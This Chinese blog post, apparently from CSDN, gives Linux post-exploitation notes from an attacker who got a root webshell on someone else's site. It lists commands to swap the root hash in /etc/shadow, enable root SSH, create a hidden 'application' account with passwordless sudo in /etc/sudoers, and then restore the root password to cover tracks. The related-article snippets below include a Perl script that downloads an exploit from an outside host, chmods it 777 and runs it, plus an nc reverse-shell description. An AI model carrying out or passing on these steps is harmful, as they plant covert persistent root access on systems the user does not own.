LINUX提权笔记

最新推荐文章于 2022-08-10 11:35:29 发布
最新推荐文章于 2022-08-10 11:35:29 发布
阅读量98 收藏
点赞数
文章标签: 运维 java

没啥技术含量,一种思路,让某些得到root权限webshell的童鞋可以快点拿到权限。

某日拿到某站webshell,RedHat 系统,Tomcat程序是root身份启动的,webshell当然也拥有root权限。

1.webshell直接替换root密码: /etc/shadow    // 记得备份

2.允许root通过ssh登陆: /etc/ssh/sshd_config

PermitRootLogin yes #允许root登陆

3.重启ssh服务 service ssh restart

4.以root身份登陆ssh,增加一个用户

useradd application

passwd // 根据提示设置密码

5.更改application用户运行su不需密码

chmod +w /etc/sudoers // 增加写入权限,默认只读

修改/etc/sudoers

vi /etc/sudoers

加入application ALL=(ALL) NOPASSWD: ALL

6.把root密码修改回原样,禁止root登陆。并去除sudoers的写属性(chmod -w /etc/sudoers)。完工

最后,上图

root用户登陆:

普通用户登陆,su免密码进入root权限

 

weixin_34402408
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux提权笔记.txt
01-09
Linux系统安全学习
【内网安全】——Linux提权姿势
Demo不是emo的博客
02-08 5598
Linux提权姿势汇总
linux提权学习笔记
hklearner的博客
04-04 4451
linux提权学习笔记 操作系统信息 (cat /proc/version || uname -a ) 2>/dev/null lsb_release -a 2>/dev/null # old, not by default on many systems cat /etc/os-release 2>/dev/null # universal PATH 如果您对变量内的任何文件夹具有写入权限,您可能能够劫持一些库或二进制文件:PATH echo $PATH 环境信息 (env ||
Linux提权简单总结
Aiwin的博客
08-10 2222
Linux提权简单总结
记录一次linux内网完整渗透测试
NZXHJ的博客
07-18 3542
记录一次完整系统的linux内网渗透测试
Linux系统提权思路
Just Do It
03-22 2万+
渗透测试过程中,拿到Webshell之后,常规都会去看一下系统是啥权限。这里主要讨论Linux系统的一些思路。       常规思路不用说了,先查看Linux内核版本,然后直接去搜一下是否有关于该版本的提权exp放出来,如果有的话,直接编译运行提权即可,简单粗暴。       如果没有相关内核的提权exp放出来,那就需要考虑其他思路了。这篇老外的文章,介绍了常规的三种提权思路,第一种就是内核e
webshell以root权限运行的linux提权笔记.txt
01-09
Linux系统安全学习
常见windwos提权笔记
最新发布
03-30
#### 四、Linux提权简介 - **提权至root用户**: 类似于Windows中的提权概念,在Linux系统中则是将普通用户提升至拥有最高权限的root用户。 #### 五、常见提权环境介绍 ##### 5.1 Webshell - **定义**: Webshell是...
sudo提权和普通用户免密切换到root详细笔记
07-02
笔记将详细讲解如何通过`sudo`进行提权以及设置普通用户免密切换到root的方法。 首先,我们创建一个新的用户`shi`: ```bash [root@www ~]# useradd shi ``` 接着,我们为`shi`用户设置密码: ```bash [root@...
linux系统优化详细笔记文档
07-09
- 添加普通用户,并通过`sudo`命令提权,避免直接使用root权限。在`/etc/sudoers`文件中配置,可以控制用户对命令的访问权限,比如让特定用户无需密码执行特定命令。 5. **sshd安全配置**: - 修改`/etc/ssh/sshd...
宝塔linux提权,宝塔windows面板提权获取系统管理员权限方法!(非漏洞BUG)
weixin_35559202的博客
05-16 1267
前不久铁网维提到过宝塔linux面板获取root权限的方法,这次我们来谈谈宝塔windows面板如何提权拿管理员权限。使用过宝塔管理面板的朋友都知道,宝塔面板的文件管理是可以访问各个硬盘目录有,并能修改删除上传,这对整个服务器安全来说是相当危险的。该方法的前提是你获取了宝塔的后台管理权限否则就不用往下看了,下面来说说宝塔windows面板提权过程。测试系统:windows 2008宝塔window...
Linux提权思路+实战【很不错的文章】
热门推荐
大方子
10-04 2万+
Linux提权思路 前言 首先关于Linux提权我们得先明白几个概念。 linux发行版本 是我们常说的Linux操作系统,也即是由Linux内核与各种常用软件的集合产品,全球大约有数百款的Linux系统版本,每个系统版本都有自己的特性和目标人群, 例如: CentOS redhat ubuntu kali linux内核 Linux系统内核指的是一个由Linus Torvald...
LINUX下使用NC反弹CMDSHELL提权
weixin_33890526的博客
03-25 786
很多时候linux拿到shell了,然后在菜刀或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!先看下linux内核 2.6.18-194.11.3.el5 内核 ,这个好CentOS release 5.5的系统! 找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666 然后...
linux提权(部分)
E1even的博客
07-29 203
linux提权方式有很多,这里从易到难在自己电脑做个笔记,根据其他师傅的笔记在自己电脑上面复现一下 明文密码提取 基础知识: etc/passwd 储存了用户,全用户可读,root 可写。 etc/shadow 存储密码的 hash,仅 root 可读写。 这里我使用的是Centons: 查看一下etc/passwd里面存储的用户账号密码信息: passwd 由冒号分割,第一列是用户名,第二列是密码,x 代表密码 hash 被放在 shadow 里面了(这样非 root 就看不到了)。而 shadow 里面
Linux MySQL Udf 提权
Coisini的博客
06-12 2199
前几天做一个小竞赛中有一个题目:给定的测试环境登录页面有POST注入漏洞,于是果断操起sqlmap跑数 据,无意中发现当前MySQL连接用户为root,于是想到udf提权「虽然Windows下MySQL提权基本上没问题,但是Linux环境下原来一直 没成功过。」,最终成功获取root权限「主要问题在于MySQL是以root权限运行」,记录笔记如下,方便以后查阅: 具体步骤如下 找到MySQL插件...
UAC
qq_41232519的博客
07-08 237
windows提权: 传统提权: 1、拿到web shell后,上传大马,上传cmd 2、看是否有足够的权限 3、有权限,直接添加账户 4、没有权限,用msf生成一个反弹的shell.exe,用上传的cmd执行shell.exe产生一个会话进行提权 数据库提权(): 1、通过信息搜集获取服务器的数据库类型(这里用mysql数据库进行提权) 2、查看网站配置文件获取数据库的账号和密码(此处演示是mysql数据库) 数据库配置文件:conn、config、data、sql、common 、inc等 数据库目录文
webshell提权
free_xiaochen的博客
09-11 8667
提权 提权前奏 提权:主要是针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得服务器权限 通常所处的权限:  ASP/PHP 匿名权限 ASPX USER权限 JSP 通常是系统权限 收集信息:  内外网 服务器系统和版本位数 服务器的补丁情况 服务器的安装软件情况 服务器的防护软件情况 端口情况 支持脚本情况 。。...
linux系统提权利器
weixin_33853794的博客
06-28 124
原理:下载一个运行一个,直到root为止。 用法:perl root.pl 内容: #!/usr/bin/perl #linux Kernel 2010-2011 get root { system(“wget marwal.ng.pl/tmp/install_4d8289a2d7a3d/1″); system(“chmod 777 1″);...
宝塔开启root_宝塔linux面板获取服务器root权限方法。(非漏洞BUG)
weixin_39960147的博客
12-22 3534
宝塔linux面板安全吗?这个问题大家都很担心,毕竟作为线上生产环境一旦出现问题相当麻烦。2017/5/24更新宝塔linux面板获取服务器root权限方法。宝塔的出现更多是为了方便对linux不熟悉的用户计划任务中支持shell脚本 经测试可以通过计划任务获取服务器root权限。如果一旦被非法获取到宝塔面板后台登录资料服务器将岌岌可危shell内容:echo "wwwtiewwcom::0:0:...
Linux系统提权方法总结
以下是笔记中列出的具体提权步骤: 1. **利用webshell获取root权限**:webshell可以用来读取或篡改敏感文件,如`/etc/shadow`,这个文件存储了用户密码的加密形式。如果webshell具有写入权限,攻击者可能修改此文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值